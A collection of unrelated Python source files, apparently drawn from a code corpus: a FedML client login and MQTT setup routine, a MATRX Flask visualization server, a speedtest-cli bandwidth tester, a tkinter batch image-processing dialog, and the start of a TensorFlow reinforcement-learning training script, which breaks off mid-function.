self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_IDLE)
# Setup MQTT message listener for starting training
topic_start_train = "flserver_agent/" + str(self.edge_id) + "/start_train"
self.mqtt_mgr.add_message_listener(topic_start_train, self.callback_start_train)
# Setup MQTT message listener for stopping training
topic_stop_train = "flserver_agent/" + str(self.edge_id) + "/stop_train"
self.mqtt_mgr.add_message_listener(topic_stop_train, self.callback_stop_train)
# Setup MQTT message listener for client status switching
topic_client_status = "fl_client/mlops/" + str(self.edge_id) + "/status"
self.mqtt_mgr.add_message_listener(topic_client_status, self.callback_client_status)
# Start MQTT message loop
self.mqtt_mgr.loop_forever()
def __login_internal(userid, version):
# Build arguments for client runner.
try:
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# default arguments
parser.add_argument("login", help="Login to MLOps platform (open.fedml.ai)")
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='account id at open.fedml.ai MLOps platform')
parser.add_argument("--version", "-v", type=str, default="release")
parser.add_argument("--docker", "-d", type=str, default="false")
args = parser.parse_args()
except Exception as e:
pass
__login(args, userid, version)
def save_edge_infos(unique_device_id, edge_id):
home_dir = expanduser("~")
local_pkg_data_dir = os.path.join(home_dir, "fedml-client", "fedml", "data")
try:
os.makedirs(local_pkg_data_dir)
except Exception as e:
pass
edge_info_file = os.path.join(local_pkg_data_dir, "edge_infos.yaml")
edge_info_file_handle = open(edge_info_file, 'w', encoding='utf-8')
edge_info_file_handle.writelines(["unique_device_id: {}\n".format(str(unique_device_id)),
"edge_id: {}\n".format(str(edge_id))])
edge_info_file_handle.flush()
edge_info_file_handle.close()
def __login(args, userid, version):
setattr(args, "account_id", userid)
home_dir = expanduser("~")
setattr(args, "current_running_dir", os.path.join(home_dir, "fedml-client"))
sys_name = platform.system()
if sys_name == "Darwin":
sys_name = "MacOS"
setattr(args, "os_name", sys_name)
setattr(args, "version", "dev")
if version == "local":
setattr(args, "version", "local")
setattr(args, "log_file_dir", os.path.join(args.current_running_dir, "fedml", "logs"))
setattr(args, "device_id", FedMLClientRunner.get_device_id())
setattr(args, "config_version", version)
setattr(args, "cloud_region", "")
# Create client runner for communication with the FedML server.
client_runner = FedMLClientRunner(args, '')
# Fetch configs from the MLOps config server.
service_config = dict()
config_try_count = 0
edge_id = 0
while config_try_count < 5:
try:
mqtt_config, s3_config, mlops_config, docker_config = client_runner.fetch_configs()
service_config["mqtt_config"] = mqtt_config
service_config["s3_config"] = s3_config
service_config["ml_ops_config"] = mlops_config
service_config["docker_config"] = docker_config
client_runner.agent_config = service_config
break
except Exception as e:
config_try_count += 1
time.sleep(3)
continue
if config_try_count >= 5:
click.echo("Oops, you failed to login the FedML MLOps platform.")
click.echo("Please check whether your network is normal!")
return
# Build unique device id
if args.device_id is not None and len(str(args.device_id)) > 0:
unique_device_id = "@" + args.device_id + "." + args.os_name
# Bind account id to the MLOps platform.
register_try_count = 0
edge_id = 0
while register_try_count < 5:
try:
edge_id = client_runner.bind_account_and_device_id(
service_config["ml_ops_config"]["EDGE_BINDING_URL"], args.account_id, unique_device_id, args.os_name
)
if edge_id > 0:
client_runner.edge_id = edge_id
break
except Exception as e:
register_try_count += 1
time.sleep(3)
continue
if edge_id <= 0:
click.echo("Oops, you failed to login the FedML MLOps platform.")
click.echo("Please check whether your network is normal!")
return
# Log arguments and binding results.
click.echo(args)
click.echo("login: unique_device_id = %s" % str(unique_device_id))
click.echo("login: edge_id = %s" % str(edge_id))
save_edge_infos(args.device_id + "." + args.os_name, edge_id)
click.echo("Congratulations, you have logged into the FedML MLOps platform successfully!")
click.echo("Your device id is " + str(unique_device_id) + ". You may review the device in the MLOps edge device list.")
# Setup MQTT connection for communication with the FedML server.
client_runner.setup_mqtt_connection(service_config)
def login(args):
__login(args, args.user, args.version)
def logout():
FedMLClientRunner.cleanup_edge_run_process()
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--type", "-t", help="Login or logout to MLOps platform (open.fedml.ai)")
parser.add_argument("--user", "-u", type=str,
help='account id at open.fedml.ai MLOps platform')
parser.add_argument("--version", "-v", type=str, default="release")
args = parser.parse_args()
click.echo(args)
args.user = int(args.user)
if args.type == 'login':
login(args)
else:
logout(args)
|
visualization_server.py | import threading
import logging
from flask import Flask, render_template, request, jsonify
'''
This file holds the code for the MATRX RESTful API.
External scripts can send POST and/or GET requests to retrieve state, tick and other information, and send
userinput or other information to MATRX. The API is a Flask (Python) webserver.
For visualization, see the seperate MATRX visualization folder / package.
'''
debug = True
port = 3000
app = Flask(__name__, template_folder='templates', static_folder='static/')
#########################################################################
# Visualization server routes
#########################################################################
@app.route('/human-agent/<id>')
def human_agent_view(id):
"""
Route for HumanAgentBrain
Parameters
----------
id
The human agent ID. Is obtained from the URL.
Returns
-------
str
The template for this agent's view.
"""
return render_template('human_agent.html', id=id)
# route for agent, get the ID from the URL
@app.route('/agent/<id>')
def agent_view(id):
"""
Route for AgentBrain
Parameters
----------
id
The agent ID. Is obtained from the URL.
Returns
-------
str
The template for this agent's view.
"""
return render_template('agent.html', id=id)
@app.route('/god')
def god_view():
"""
Route for the 'god' view which contains the ground truth of the world without restrictions.
Returns
-------
str
The template for this view.
"""
return render_template('god.html')
@app.route('/')
@app.route('/start')
def start_view():
"""
Route for the 'start' view which shows information about the current scenario, including links to all agents.
Returns
-------
str
The template for this view.
"""
return render_template('start.html')
@app.route('/shutdown_visualizer', methods=['GET', 'POST'])
def shutdown():
""" Shuts down the visualizer by stopping the Flask thread
Returns
True
-------
"""
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Unable to shutdown visualizer server. Not running with the Werkzeug Server')
func()
print("Visualizer server shutting down...")
return jsonify(True)
#########################################################################
# Visualization Flask methods
#########################################################################
def flask_thread():
"""
Starts the Flask server on localhost:3000
"""
if not debug:
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
app.run(host='0.0.0.0', port=port, debug=False, use_reloader=False)
def run_matrx_visualizer(verbose):
"""
Creates a seperate Python thread in which the visualization server (Flask) is started, serving the JS visualization
:return: MATRX visualization Python thread
"""
global debug
debug = verbose
print("Starting visualization server")
print("Initialized app:", app)
vis_thread = threading.Thread(target=flask_thread)
vis_thread.start()
return vis_thread
if __name__ == "__main__":
run_matrx_visualizer() |
ujicoba.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__version__ = '0.3.1'
# Some global variables we use
source = None
shutdown_event = None
import os
import re
import sys
import math
import signal
import socket
import timeit
import threading
# Used for bound_interface
socket_socket = socket.socket
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
from http.client import HTTPConnection, HTTPSConnection
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1))
* math.cos(math.radians(lat2)) * math.sin(dlon / 2)
* math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
f = urlopen(self.url)
while 1 and not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
f = urlopen(self.url, self.data)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
uh = urlopen('http://www.speedtest.net/speedtest-config.php')
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError:
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
uh = urlopen('http://www.speedtest.net/speedtest-servers-static.php')
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError:
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
print_('Failed to parse list of speedtest.net servers')
sys.exit(1)
servers = {}
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']), float(client['lon'])],
[float(attrib.get('lat')), float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
start = timeit.default_timer()
h.request("GET", urlparts[2])
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event, source
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('bytes', 1), default=('bits', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except NameError:
print_('\n'.join(serverList))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
f = urlopen(args.mini)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
f = urlopen('%s/speedtest/upload.%s' % (args.mini, ext))
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
if not args.simple:
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
except NameError:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
req = Request('http://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode())
req.add_header('Referer', 'http://c.speedtest.net/flash/speedtest.swf')
f = urlopen(req)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: http://www.speedtest.net/result/%s.png' %
resultid[0])
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
batch.py |
import tkinter
from tkinter import *
from tkinter import ttk
import threading
import time
from tkinter import filedialog, messagebox
from imageProcess import ImageProcess
import os
class Batch():
def __init__(self, master, treeview, save_path, dirname):
self.save_path = save_path
self.dirname = dirname
self.treeview = treeview
self.w = Toplevel(master)
self.w.grab_set()
self.w.title('batch process')
# self.w.pack()
Button(self.w, text = 'choose a folder to save results', command = self._on_path).grid(row = 0, column = 0, sticky = 'w', padx = (5,5), pady = (5,2))
self.dirPath = Entry(self.w, width = 120)
self.dirPath.insert(0, self.save_path)
self.dirPath.grid(row = 1, column = 0, columnspan = 2,sticky = 'w', padx = (5,5))
self.var_wafer = IntVar(value = 1)
self.var_rgb_data = IntVar(value = 1)
check_f = LabelFrame(self.w, text = 'choose which files to save', fg = 'blue')
check_f.grid(row = 2, column = 0, sticky = 'w', pady = (5,5), padx = (5,5))
Checkbutton(check_f, text = 'wafer image', variable = self.var_wafer, fg= 'blue',onvalue = 1, offvalue = 0, command = self._on_wafer).pack(side = 'left', padx = (5,5))
Checkbutton(check_f, text = 'RGB .cvs', variable = self.var_rgb_data, fg= 'blue',onvalue = 1, offvalue = 0,command = self._on_rgb_data).pack(side = 'left', padx = (5,5))
Button(self.w, text = 'run', width = 8, fg = 'red', command=self._on_run).grid(row = 3, column =1, sticky = 'e', padx = (5,5), pady = (5,5))
def _on_run(self):
self.run(self.treeview)
self.w.destroy()
def _on_wafer(self):
self.var_wafer.set(0) if self.var_wafer.get() ==0 else self.var_wafer.set(1)
def _on_rgb_data(self):
self.var_rgb_data.set(0) if self.var_rgb_data.get() ==0 else self.var_rgb_data.set(1)
def _on_path(self):
self.save_path = filedialog.askdirectory()
self.dirPath.delete(0, 'end')
self.dirPath.insert(0, self.save_path)
def run(self, treeview):
threading.Thread(target = lambda treeview = treeview:self.go(treeview)).start()
def go(self, treeview):
succeed = 0
fail = 0
for index in treeview.get_children():
treeview.focus(index)
treeview.selection_set(index)
treeview.item(index, tags = index)
imageName = self.treeview.item(index, 'text')
try:
imageProcess = ImageProcess(os.path.join(self.dirname,imageName))
image_path = os.path.join(self.save_path,imageName[:-4])
if self.var_rgb_data.get() ==1:
imageProcess.save_rgb_data(image_path)
if self.var_wafer.get() ==1:
imageProcess.save_wafer_image(image_path)
treeview.tag_configure(index, background='lightgreen')
succeed += 1
except:
treeview.tag_configure(index, background='tomato')
fail +=1
pass
time.sleep(0.2)
messagebox.showinfo(message =f'{succeed} succeeded and {fail} failed')
def main():
# print(version('tkinter'))
# import pkg_resources
# print(pkg_resources.get_distribution('tkinter').version)
root = Tk()
# treeview = ttk.Treeview(root)
# treeview.pack()
# for i in range(8):
# treeview.insert("", 'end', text = i)
# ttk.Style().theme_use('clam')
Batch(root)
# app = Batch().run(treeview)
root.mainloop()
if __name__ == '__main__':
main()
|
train.py | #!/usr/bin/env python
from worker import *
from network import *
import threading
from time import sleep
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_boolean('is_approaching_policy', False, 'If learning approaching policy.')
flags.DEFINE_integer('max_episodes', 100000, 'Maximum episodes.')
flags.DEFINE_integer('max_episode_steps', 1000, 'Maximum steps for each episode.')
flags.DEFINE_integer('max_lowlevel_episode_steps', 50,
'Maximum number of steps the robot can take during one episode in low-level policy.')
flags.DEFINE_integer('batch_size', 64,
'The size of replay memory used for training.')
flags.DEFINE_float('gamma', 0.99, 'Discount factor.')
flags.DEFINE_boolean('use_gt', False, 'If use ground truth detection.')
flags.DEFINE_integer('window_size', 10, 'The size of vision window.')
flags.DEFINE_integer('num_labels', 78, 'The size of option space.')
flags.DEFINE_integer('a_size', 6, 'The size of action space.')
flags.DEFINE_integer('history_steps', 4, 'The number of steps need to remember during training.')
flags.DEFINE_multi_float('er', [0.01, 1000, 0.01],
'[Initial exploration rate, anneal steps, final exploration rate]')
flags.DEFINE_float('highlevel_lr', 0.0001, 'Highlevel learning rate.')
flags.DEFINE_float('lowlevel_lr', 0.0001, 'Lowlevel learning rate.')
flags.DEFINE_string('vision_feature_pattern', '_deeplab_depth_logits_10', 'Which feature to use to represent vision.')
flags.DEFINE_string('depth_feature_pattern', '_deeplab_depth_depth1_10', 'Which feature to use to represent depth.')
flags.DEFINE_integer('replay_start_size', 0, 'The number of observations stored in the replay buffer before training.')
flags.DEFINE_integer('skip_frames', 1, 'The times for low-level action to repeat.')
flags.DEFINE_integer('highlevel_update_freq', 100, 'Highlevel network update frequency.')
flags.DEFINE_integer('lowlevel_update_freq', 10, 'Lowlevel network update frequency.')
flags.DEFINE_integer('target_update_freq', 100000, 'Target network update frequency.')
flags.DEFINE_multi_float('epsilon', [1, 10000, 0.1], ['Initial exploration rate', 'anneal steps', 'final exploration rate'] )
flags.DEFINE_boolean('load_model', True, 'If load previous trained model or not.')
flags.DEFINE_boolean('curriculum_training', True, 'If use curriculum training or not.')
flags.DEFINE_boolean('continuing_training', False, 'If continue training or not.')
flags.DEFINE_string('pretrained_model_path', '../A3C/result_se_for_pretrain/model', 'The path to load pretrained model from.')
flags.DEFINE_string('model_path', './result_se_pretrain/model', 'The path to store or load model from.')
flags.DEFINE_integer('num_scenes', 8, 'The number of scenes used for training.')
flags.DEFINE_integer('num_targets', 15, 'The number of targets for each scene that are used for training ')
flags.DEFINE_integer('num_threads', 1, 'The number of threads to train one scene one target.')
flags.DEFINE_boolean('use_default_scenes', True, 'If use default scenes for training.')
flags.DEFINE_boolean('use_default_targets', True, 'If use default targets for training.')
flags.DEFINE_multi_string('default_scenes',['5cf0e1e9493994e483e985c436b9d3bc',
'0c9a666391cc08db7d6ca1a926183a76',
'0c90efff2ab302c6f31add26cd698bea',
'00d9be7210856e638fa3b1addf2237d6',
'07d1d46444ca33d50fbcb5dc12d7c103',
'026c1bca121239a15581f32eb27f2078',
'0147a1cce83b6089e395038bb57673e3',
'0880799c157b4dff08f90db221d7f884'
],
'Default scenes')
flags.DEFINE_multi_string('default_targets',
['music', 'television', 'heater', 'stand', 'dressing_table', 'table',
'bed', 'mirror', 'ottoman', 'sofa', 'desk', 'picture_frame', 'tv_stand',
'toilet', 'bathtub'
],
'Default targets.')
flags.DEFINE_string('evaluate_file', '', '')
def get_trainable_scenes_and_targets(use_gt=True):
if FLAGS.use_default_scenes:
scenes = FLAGS.default_scenes
else:
scenes = json.load(open('%s/Environment/collected_houses.json' % cfg['codeDir'], 'r'))['houses']
targets = []
starting_points = []
target_points = []
for scene in scenes[:FLAGS.num_scenes]:
scene_dir = '%s/Environment/houses/%s/' % (cfg['codeDir'], scene)
if FLAGS.use_default_targets:
all_targets = FLAGS.default_targets
else:
if FLAGS.use_gt:
all_targets = json.load(open('%s/targets_info_all.json' % scene_dir, 'r')).keys()
else:
all_targets = json.load(open('%s/targets_info_all_pred.json' % scene_dir, 'r')).keys()
all_target_points = get_target_points(scene, all_targets, use_gt=True)
all_starting_points = get_starting_points(scene, all_targets, use_gt=FLAGS.use_gt) \
if FLAGS.is_approaching_policy else get_starting_points_according_to_distance(scene, all_targets)
scene_targets = []
scene_target_points = []
scene_starting_points = []
num_targets = 0
for i,t in enumerate(all_targets):
t_points = all_target_points[t]
s_points = [p for p in all_starting_points[i] if p not in t_points]
if len(t_points) != 0 and len(s_points) != 0:
scene_targets.append(t)
scene_target_points.append(t_points)
scene_starting_points.append(s_points)
num_targets += 1
if num_targets == FLAGS.num_targets: break
if FLAGS.is_approaching_policy and FLAGS.curriculum_training:
scene_starting_points = sort_starting_points_according_to_distance(scene, scene_targets, scene_starting_points)
targets.append(scene_targets)
starting_points.append(scene_starting_points)
target_points.append(scene_target_points)
return scenes, targets, starting_points, target_points
def set_up():
if not os.path.exists(FLAGS.model_path):
os.makedirs(FLAGS.model_path)
tf.reset_default_graph()
graph = tf.Graph()
with graph.as_default():
global_episodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)
global_frames = tf.Variable(0, dtype=tf.int32, name='global_frames', trainable=False)
lowlevel_network = Lowlevel_Network(window_size=FLAGS.window_size,
num_labels=FLAGS.num_labels,
action_size=FLAGS.a_size,
history_steps=FLAGS.history_steps,
scope='global')
scenes, targets, starting_points, target_points = get_trainable_scenes_and_targets()
tools = []
min_steps = []
for scene in scenes:
vision_feature_tool = Feature_Tool(scene_name=scene, feature_pattern=FLAGS.vision_feature_pattern)
depth_feature_tool = Feature_Tool(scene_name=scene, feature_pattern=FLAGS.depth_feature_pattern)
bbox_tool = Bbox_Tool(scene, use_gt=FLAGS.use_gt)
tools.append([vision_feature_tool, depth_feature_tool, bbox_tool])
min_steps.append(json.load(open('%s/Environment/houses/%s/minimal_steps_1.json' % (cfg['codeDir'], scene), 'r')))
workers = []
for i in range(FLAGS.num_threads):
local_lowlevel_network = Lowlevel_Network(window_size=FLAGS.window_size,
num_labels=FLAGS.num_labels,
action_size=FLAGS.a_size,
history_steps=FLAGS.history_steps,
scope='local_%d'%i)
